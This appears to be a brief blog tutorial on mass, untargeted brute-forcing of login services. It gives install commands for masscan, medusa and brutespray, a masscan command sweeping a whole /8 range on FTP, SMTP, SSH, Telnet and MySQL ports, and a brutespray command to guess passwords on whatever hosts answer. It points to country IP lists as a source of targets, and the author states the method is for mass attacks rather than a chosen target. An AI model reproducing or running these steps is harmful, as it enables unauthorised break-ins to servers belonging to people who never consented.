Auto BruteForce Many Ports & IP
1 minute read
https://tdeepnet.blogspot.com/
what is a brute force attack:
In a nutshell a brute-force attack is when an attacker tires many passwords on a port like SSH/FTP/SQL/Telnet/SMTP with a program like Hydra and Medusa to try and gain access to the system. If you have a set target then this method is not good this is for mass brute brute-force IP & Ports.You will need to have masscan and this tool from githubhttps://github.com/x90skysn3k/brutespray
Install masscan:
Debian
Code: Select all
sudo apt-get install masscan
Code: Select all
sudo pacman -S masscan
Debian
Code: Select all
sudo apt-get install git
Code: Select all
sudo pacman -S git
Code: Select all
sudo git clone https://github.com/x90skysn3k/brutespray.git
Debian
Code: Select all
sudo apt-get install medusa
Code: Select all
sudo pacman -S medusa
You can get lots of IP here : https://ipinfo.io/countries
Code: Select all
sudo masscan <some IP>/8 -p21,25,587,22,23,3306 -oG scan
Using brutespray:
Code: Select all
sudo python brutespray.py --file scan --threads 5 --hosts 1
image quote pre code